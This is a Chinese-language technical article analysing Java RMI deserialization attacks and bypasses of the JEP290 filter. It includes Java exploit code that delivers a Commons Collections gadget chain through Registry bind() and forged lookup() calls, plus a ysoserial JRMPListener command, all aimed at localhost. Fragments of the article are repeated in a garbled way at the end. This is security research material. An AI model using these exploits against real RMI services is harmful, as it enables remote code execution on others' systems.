Java RMI 反序列化攻击与JEP290绕过分析<\/h1>

1. RMI基础概念<\/h2>

1.1 RPC与RMI<\/h3>

RPC(Remote Procedure Call)远程过程调用，允许像调用本地函数一样调用远程函数。RMI(Remote Method Invocation)是Java实现的RPC框架。<\/p>

RPC演化流程：<\/p>

Client通过Stub类传递类名、方法名与参数信息给Server<\/li>
Server从本地注册表找到具体类<\/li>
通过反射获取方法并执行<\/li>

返回结果<\/li> <\/ol>

1.2 Java代理模式<\/h3>
代理模式提供对目标对象额外的访问方式，分为：<\/p>

静态代理<\/h4>

代理对象和目标对象实现相同接口<\/li>

缺点：冗余、不易维护<\/li> <\/ul>

动态代理<\/h4>

利用反射动态构建代理对象<\/li>
要求目标对象必须实现接口<\/li>

核心类：

InvocationHandler<\/code>和Proxy<\/code><\/li>
<\/ul>
2. RMI工作机制<\/h2>
2.1 RMI基本组件<\/h3>

远程接口<\/strong>：继承java.rmi.Remote<\/code>，方法抛出RemoteException<\/code><\/li>
远程对象实现<\/strong>：继承UnicastRemoteObject<\/code>，实现远程接口<\/li>
Registry<\/strong>：注册中心，管理远程对象引用<\/li>
Stub\/Skeleton<\/strong>：客户端代理和服务端骨架<\/li>
<\/ul>
2.2 RMI通信流程<\/h3>

Server注册远程对象到Registry<\/li>
Client从Registry获取Stub<\/li>
Client通过Stub调用远程方法<\/li>
参数序列化传输到Server<\/li>
Server反序列化参数并执行方法<\/li>
结果序列化返回Client<\/li>
<\/ol>
2.3 JRMP协议<\/h3>
Java远程方法协议(JRMP)是RMI底层协议，运行在TCP\/IP之上，负责远程对象查找和引用。<\/p>
3. RMI反序列化攻击<\/h2>
3.1 攻击场景<\/h3>
1. 客户端\/服务端攻击Registry<\/h4>

通过bind()<\/code>\/rebind()<\/code>传递恶意对象<\/li>
通过伪造请求攻击lookup()<\/code>\/unbind()<\/code><\/li>
<\/ul>
2. Registry攻击客户端\/服务端<\/h4>

恶意Registry返回恶意对象<\/li>
<\/ul>
3. 客户端攻击服务端<\/h4>

传递恶意对象作为参数<\/li>
<\/ul>
4. 服务端攻击客户端<\/h4>

返回恶意对象<\/li>
<\/ul>
3.2 攻击示例<\/h3>
通过bind()攻击Registry<\/h4>
\/\/ 构造CC链恶意对象
<\/span><\/span><\/span><\/span>Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]<\/span> {...};<\/span>
<\/span><\/span>Transformer transformerChain =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>Map innerMap =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>Map outerMap =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>innerMap,<\/span> null<\/span>,<\/span> transformerChain);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建AnnotationInvocationHandler代理
<\/span><\/span><\/span><\/span>Class cl =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span>
<\/span><\/span>Constructor ctor =<\/span> cl.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span>
<\/span><\/span>InvocationHandler handler =<\/span> (<\/span>InvocationHandler)<\/span>ctor.<\/span>newInstance<\/span>(<\/span>Retention.<\/span>class<\/span>,<\/span> outerMap);<\/span>
<\/span><\/span>Remote proxy =<\/span> Remote.<\/span>class<\/span>.<\/span>cast<\/span>(<\/span>Proxy.<\/span>newProxyInstance<\/span>(<\/span>Remote.<\/span>class<\/span>.<\/span>getClassLoader<\/span>(),<\/span> new<\/span> Class[]{<\/span>Remote.<\/span>class<\/span>},<\/span> handler));<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 绑定恶意对象
<\/span><\/span><\/span><\/span>Registry registry =<\/span> LocateRegistry.<\/span>getRegistry<\/span>(<\/span>"127.0.0.1"<\/span>,<\/span> 3333<\/span>);<\/span>
<\/span><\/span>registry.<\/span>bind<\/span>(<\/span>"evil"<\/span>,<\/span> proxy);<\/span>
<\/span><\/span><\/code><\/pre>通过伪造请求攻击lookup()<\/h4>
\/\/ 获取Registry的UnicastRef和operations
<\/span><\/span><\/span><\/span>Field[]<\/span> fields =<\/span> registry.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getDeclaredFields<\/span>();<\/span>
<\/span><\/span>UnicastRef ref =<\/span> (<\/span>UnicastRef)<\/span>fields[<\/span>0<\/span>].<\/span>get<\/span>(<\/span>registry);<\/span>
<\/span><\/span>Operation[]<\/span> ops =<\/span> (<\/span>Operation[])<\/span>registry.<\/span>getClass<\/span>().<\/span>getDeclaredFields<\/span>()[<\/span>0<\/span>].<\/span>get<\/span>(<\/span>registry);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 伪造lookup请求
<\/span><\/span><\/span><\/span>RemoteCall call =<\/span> ref.<\/span>newCall<\/span>((<\/span>RemoteObject)<\/span>registry,<\/span> ops,<\/span> 2<\/span>,<\/span> 4905912898345647071L<\/span>);<\/span>
<\/span><\/span>ObjectOutput out =<\/span> call.<\/span>getOutputStream<\/span>();<\/span>
<\/span><\/span>out.<\/span>writeObject<\/span>(<\/span>proxy);<\/span> \/\/ 写入恶意对象
<\/span><\/span><\/span><\/span>ref.<\/span>invoke<\/span>(<\/span>call);<\/span>
<\/span><\/span><\/code><\/pre>4. JEP290机制与绕过<\/h2>
4.1 JEP290机制<\/h3>


功能<\/strong>：<\/p>

限制可反序列化的类(白名单\/黑名单)<\/li>
限制反序列化深度和复杂度<\/li>
为RMI提供验证机制<\/li>
可配置过滤<\/li>
<\/ul>
<\/li>

白名单<\/strong>：

String.class<\/code>, Number.class<\/code>, Remote.class<\/code>, Proxy.class<\/code>, UnicastRef.class<\/code>等<\/p>
<\/li>
<\/ul>
4.2 JEP290绕过(<=8u231)<\/h3>
UnicastRef绕过原理<\/h4>

构造包含JRMPListener地址的UnicastRef<\/li>
Registry反序列化时建立到JRMPListener的连接<\/li>
JRMPListener返回恶意对象<\/li>
恶意对象在无过滤环境下被反序列化<\/li>
<\/ol>
绕过代码<\/h4>
\/\/ 启动恶意JRMPListener
<\/span><\/span><\/span>\/\/ java -cp ysoserial.jar ysoserial.exploit.JRMPListener 3333 CommonsCollections5 "calc"
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 客户端代码
<\/span><\/span><\/span><\/span>ObjID id =<\/span> new<\/span> ObjID(<\/span>new<\/span> Random().<\/span>nextInt<\/span>());<\/span>
<\/span><\/span>TCPEndpoint te =<\/span> new<\/span> TCPEndpoint(<\/span>"127.0.0.1"<\/span>,<\/span> 3333<\/span>);<\/span>
<\/span><\/span>UnicastRef ref =<\/span> new<\/span> UnicastRef(<\/span>new<\/span> LiveRef(<\/span>id,<\/span> te,<\/span> false<\/span>));<\/span>
<\/span><\/span>RemoteObjectInvocationHandler obj =<\/span> new<\/span> RemoteObjectInvocationHandler(<\/span>ref);<\/span>
<\/span><\/span>Registry proxy =<\/span> (<\/span>Registry)<\/span>Proxy.<\/span>newProxyInstance<\/span>(<\/span>TestClient.<\/span>class<\/span>.<\/span>getClassLoader<\/span>(),<\/span> 
<\/span><\/span>                    new<\/span> Class[]{<\/span>Registry.<\/span>class<\/span>},<\/span> obj);<\/span>
<\/span><\/span>reg.<\/span>bind<\/span>(<\/span>"Hello"<\/span>,<\/span> proxy);<\/span>
<\/span><\/span><\/code><\/pre>4.3 JDK 8u231+的绕过<\/h3>
在8u231中，dirty<\/code>函数增加了过滤机制。新绕过方式利用UnicastRemoteObject<\/code>反序列化链。<\/p>
5. 防御建议<\/h2>

升级JDK到最新版本<\/li>
配置严格的对象过滤器<\/li>
限制RMI服务网络访问<\/li>
使用安全管理器<\/li>
监控反序列化操作<\/li>
<\/ol>
6. 关键点总结<\/h2>

RMI通信过程涉及多次序列化\/反序列化<\/li>
攻击面存在于Registry、Client和Server间的交互<\/li>
JEP290通过白名单限制反序列化类<\/li>
UnicastRef可绕过早期JEP290过滤<\/li>
高版本JDK需要寻找新的利用链<\/li>
<\/ol>
7. 参考工具<\/h2>

ysoserial：生成反序列化payload<\/li>
JRMPListener：恶意RMI服务端<\/li>
RMI监控工具：分析RMI通信<\/li>
<\/ul>

Java RMI 反序列化攻击与JEP290绕过分析<\/h1>

1. RMI基础概念<\/h2>

1.2 Java代理模式<\/h3> 代理模式提供对目标对象额外的访问方式，分为：<\/p>

2. RMI工作机制<\/h2>

2.3 JRMP协议<\/h3> Java远程方法协议(JRMP)是RMI底层协议，运行在TCP\/IP之上，负责远程对象查找和引用。<\/p>

3. RMI反序列化攻击<\/h2>

3.1 攻击场景<\/h3>

3.2 攻击示例<\/h3>

4. JEP290机制与绕过<\/h2>

4.3 JDK 8u231+的绕过<\/h3> 在8u231中，dirty<\/code>函数增加了过滤机制。新绕过方式利用UnicastRemoteObject<\/code>反序列化链。<\/p>

7. 参考工具<\/h2> ysoserial：生成反序列化payload<\/li> JRMPListener：恶意RMI服务端<\/li> RMI监控工具：分析RMI通信<\/li> <\/ul>

1.2 Java代理模式<\/h3>
代理模式提供对目标对象额外的访问方式，分为：<\/p>

2.3 JRMP协议<\/h3>
Java远程方法协议(JRMP)是RMI底层协议，运行在TCP\/IP之上，负责远程对象查找和引用。<\/p>

4.3 JDK 8u231+的绕过<\/h3>
在8u231中，`dirty<\/code>函数增加了过滤机制。新绕过方式利用UnicastRemoteObject<\/code>反序列化链。<\/p>`

7. 参考工具<\/h2>

ysoserial：生成反序列化payload<\/li>
JRMPListener：恶意RMI服务端<\/li>
RMI监控工具：分析RMI通信<\/li> <\/ul>